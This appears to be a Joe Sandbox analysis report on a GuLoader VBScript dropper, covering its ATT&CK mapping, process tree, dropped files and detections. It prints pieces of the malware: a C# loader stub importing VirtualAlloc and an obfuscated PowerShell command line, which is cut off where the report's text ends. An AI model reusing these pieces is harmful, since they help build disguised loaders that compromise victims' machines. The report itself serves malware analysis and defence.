Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter
Path Interception11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts421
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script421
Scripting
LSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Obfuscated Files or Information
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756154 Sample: SIEM_PO00938467648.vbs Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 29 Malicious sample detected (through community Yara rule) 2->29 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 4 other signatures 2->35 8 wscript.exe 1 1 2->8         started        process3 signatures4 37 VBScript performs obfuscated calls to suspicious functions 8->37 39 Wscript starts Powershell (via cmd or directly) 8->39 41 Obfuscated command line found 8->41 43 Very long command line found 8->43 11 powershell.exe 22 8->11         started        14 cmd.exe 1 8->14         started        process5 file6 27 C:\Users\user\AppData\...\jadyuuoq.cmdline, Unicode 11->27 dropped 16 csc.exe 3 11->16         started        19 conhost.exe 11->19         started        21 conhost.exe 14->21         started        process7 file8 25 C:\Users\user\AppData\Local\...\jadyuuoq.dll, PE32 16->25 dropped 23 cvtres.exe 1 16->23         started        process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SIEM_PO00938467648.vbs35%ReversingLabsScript-WScript.Trojan.GuLoader
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsof0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png7z100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://www.apache.org/licenses/LICENSE-2.0.html7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://crl.microsofpowershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/Licensepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://github.com/Pester/Pester7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.png7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                No contacted IP infos
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756154
                Start date and time:2022-11-29 18:22:11 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 23s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SIEM_PO00938467648.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winVBS@11/9@0/0
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS/VBS files not yet terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Execution Graph export aborted for target powershell.exe, PID 2528 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                18:24:27API Interceptor32x Sleep call for process: powershell.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):8003
                Entropy (8bit):4.842774286652891
                Encrypted:false
                SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                MD5:62F0B7274EE33977F05FE8727590EBA4
                SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Tue Nov 29 17:24:33 2022, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1324
                Entropy (8bit):3.996218436024883
                Encrypted:false
                SSDEEP:24:HEF69vZf14pDfHdzYhKPfeI+ycuZhNh6akS+LPNnq9ud:3B14t9+KPm1uloa3Eq9u
                MD5:E733462A8F00DEC1FC3565C028DDE8A1
                SHA1:8C4647CAF72EE736C2AF838FF03E3B17127276CF
                SHA-256:37F83C0D6CAB65759FAA603F14A42FD331171144D95310F68CA438C6C9056554
                SHA-512:57CD59B28F893F4A564B55454D40A83229B83C9EE93788D765AEA99C48AB4C9F1A219660ABF1FBE95CF0F07E49C198E4179E056636A39B84E6FE7F6D4C33C5E6
                Malicious:false
                Preview:L...Q@.c.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP...................x.{..qeh.g..........4.......C:\Users\user\AppData\Local\Temp\RES8B47.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.1034732649057704
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryz6ak7Ynqq+LPN5Dlq5J:+RI+ycuZhNh6akS+LPNnqX
                MD5:A000E1959178D29C7BA215716568AB67
                SHA1:8A0A43A57EA1B760DF7DD1FCDACB6B0A8D959B6E
                SHA-256:E7C6DAF4DD3722664B5B9A8522889734B6894EF4865CF3039AE842ACEF9A9D75
                SHA-512:C598A213FAEC10450E95CEBC5CBA30B2DF8ADD3F2034A8573E4E6F712E60BCA39EFCB890F14A3DB34A24E2994D6A53E20537D86BD816798764962CA5FFB26F17
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                Category:dropped
                Size (bytes):1052
                Entropy (8bit):4.997907941877808
                Encrypted:false
                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                Malicious:false
                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.219534290159127
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f9jx0zxs7+AEszIwkn23f9jDH:p37Lvkmb6KRf1jx0WZEif1jb
                MD5:71F10E9CBAE1F70E2596C2A61CC97420
                SHA1:FA92CD6FFD26D5C56701CB5FE4D572F729B119CE
                SHA-256:30B8926041F22070E9F6754C5D94C52BFAC40FBC3B48BEE485976A1DC1277915
                SHA-512:D1C7BB4EFC520E61083ABCE94399ED158DB27FE03E1B6116FE14AEE449B7AA91F56F7B42C1106FD48D12660C411C3F0E4D7911C82A32BA53E95FC5D3C10B2C78
                Malicious:true
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):4096
                Entropy (8bit):3.0786957689151206
                Encrypted:false
                SSDEEP:48:6zJk5TZxiz1MDngQzufTbFtAkMl551uloa3Eq:IIWz1MDngVfTTGKWK
                MD5:0CF30C07EE7CDE87ABEEE7BE453FD1C3
                SHA1:6014B950D79EDF5FD4FA7C34ECD4F395BDE51D06
                SHA-256:1D4A45BA7B3ED7B6CBD4843F7C0726EEB014B609A5C283777BB50EF00950BCB8
                SHA-512:207854F6708CA2F1D3013B83B6BDE1FE738484CE091FB422E33660E5C8D7AFCE3A34047E3A6005BF65983ECB5FA214DA48866267D1C9229DC9410E44F23E71D4
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q@.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                Category:modified
                Size (bytes):864
                Entropy (8bit):5.331025328863905
                Encrypted:false
                SSDEEP:24:Aqd3ka6KRf1jXEif1jaKaM5DqBVKVrdFAMBJTH:Aika6C1jXEu1jaKxDcVKdBJj
                MD5:E228E21D46CAE1BF0DF2686889AC1F17
                SHA1:7E5670AEEC66BF8A657C47E1C2A6F39F4376F547
                SHA-256:B3F7E73164CC13E52676B39D9C5D2B986B32CADF0A26E480E0D2B38A7609C033
                SHA-512:AD06727C50178B9E77052A326A5C76DDD07E7CBDA819875FFF00A3C908055BB9E6348C7BD447981F6449D33217A2AC74D6C699F0BE03D4D859D61703251437B4
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.836608054626225
                TrID:
                  File name:SIEM_PO00938467648.vbs
                  File size:350795
                  MD5:633811bccf3fe62978ce41a04b653083
                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                  Icon Hash:e8d69ece869a9ec4
                  No network behavior found

                  Click to jump to process

                  Target ID:0
                  Start time:18:23:01
                  Start date:29/11/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                  Imagebase:0x7ff65eba0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:1
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:CMD.EXE /c echo C:\Windows
                  Imagebase:0x7ff632260000
                  File size:273920 bytes
                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn 